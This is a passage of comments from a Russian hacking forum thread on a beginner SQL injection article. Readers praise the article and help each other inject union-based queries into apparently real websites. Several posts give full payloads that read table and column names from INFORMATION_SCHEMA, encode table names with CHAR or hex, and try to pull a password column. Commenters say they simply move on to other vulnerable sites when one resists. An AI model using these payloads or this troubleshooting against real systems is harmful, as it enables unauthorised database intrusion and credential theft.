HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 24.07.2010, 17:51
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от fl00der  
Ваще не понял, че надо сделать.
При еденице нет ворнингов, но число это явно маловато.
При 11 есть ворнинги, но нет ошибки SQL, т.е. как будто, это искомое число столбцов. Однако, когда я делаю id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 я получаю варнинги, а не получаю ту "фигню" с "большим и красивым числом 19" (ну у меня, уж наверное, это будет не 19, я это осознаю).
Что же это? Какой-то хитрый/недописаный фильтор? Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?
скин в личкy, посмотрю
 
Ответить с цитированием

  #32  
Старый 24.07.2010, 17:51
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

fl00der, клац.

Цитата:
Сообщение от None  
Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?
Оставлял и искал другие
 
Ответить с цитированием

  #33  
Старый 25.07.2010, 14:17
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
С нами: 8981650

Репутация: 80
По умолчанию

fl00der, никакой это не фильтр, это обычный двойной SQL запрос. Вот пример /thread175335-%E4%E2%EE%E9%ED%EE%E9+sql.html

Но увы, здесь нету универсального решения. Для каждого случая нужно составлять свою инъекцию.

Цитата:
Сообщение от None  
Оставлял и искал другие
Аналогично
 
Ответить с цитированием

  #34  
Старый 29.08.2010, 00:22
Угрюмый
Новичок
Регистрация: 03.09.2006
Сообщений: 16
С нами: 10361620

Репутация: 8
По умолчанию

Boa !

Не обращай внимания на критику. Статья нужная (имхо). Да, она не для гуру, а для самых начинающих. О чем ты и сообщил в самом начале статьи.

Лично мне она дала толчок и желание все же изучать данную тему. ДУмаю, что и многим другим начинающим она поможет.

Уважаемые гуру и кул-хацкеры!

Критиковать и тыкать носом в неточности и поверхностность статьи легче всего.

Но напомню - статья совсем не претендует на звание научного труда или революционные изыскания. И написана скорее для популяризации темы. О чем автор и предупреждает в самом начале (первые два абзаца).

И я считаю что с этой задачей статья справляется.
 
Ответить с цитированием

  #35  
Старый 29.08.2010, 00:35
ICEPack
Новичок
Регистрация: 19.08.2010
Сообщений: 8
С нами: 8279606

Репутация: 0
По умолчанию

Очень интересная и познавательная статья мне как новичку очень пригодилась !

написано всё доходчиво и понятно +
 
Ответить с цитированием

  #36  
Старый 29.08.2010, 01:12
AnGeI
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
С нами: 9170186

Репутация: 54
По умолчанию

Boa, продолжай в том же духе, пиши еще.

Прочитал бы её на пару месяцев раньше, уточнил бы для себя многие моменты.
 
Ответить с цитированием

  #37  
Старый 29.08.2010, 01:19
Sajeys
Участник форума
Регистрация: 24.08.2010
Сообщений: 206
С нами: 8272406

Репутация: 5
По умолчанию

Для первой просто великолепно...
 
Ответить с цитированием

  #38  
Старый 05.09.2010, 19:35
J0cker
Познающий
Регистрация: 27.02.2010
Сообщений: 33
С нами: 8527516

Репутация: 6
По умолчанию

Привет всем.У меня небольшая непонятка вышла

Код:
http://www.xxx.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,column_name,20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w  here+table_name=CHAR(65,100,109,105,110,83,105,116  ,101)+--+
Имя таблицы перевел в Ascii так как с простым именем таблицы получаю ошибку.Ради эксперимента переводил в Hax тож отлично работает до такого замечательного момента как вывод информации из столбца.

а именно

Код:
union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+from+CHAR(65,100,109,105,110,83,105,116  ,101)+--+
это безобразие типо

Код:
CHAR(65,100,109,105,110,83,105,116  ,101)
Менял на Hax(0x5573657273) в надежде что что то изменится но увы не чего не вышло.

Кто подскажет в чем ошибка что не так.
 
Ответить с цитированием

  #39  
Старый 05.09.2010, 22:13
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами: 9680718

Репутация: 118
По умолчанию

Зачем таблицу чарить?

Код:
union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+from+TABLE+--+
 
Ответить с цитированием

  #40  
Старый 06.09.2010, 01:45
J0cker
Познающий
Регистрация: 27.02.2010
Сообщений: 33
С нами: 8527516

Репутация: 6
По умолчанию

Цитата:
Сообщение от shellz[21h  
"]
shellz[21h] said:
Зачем таблицу чарить?
Код:
union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+from+TABLE+--+
Ну если я могу получить имена столбцов только через "Char" или "Hax" (Если указывать просто имя таблицы типа "Users" получу ошибку)

Предположил что так же стоит поступить и при выводе инфы. из столбцов.Но увы пока без успешно.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.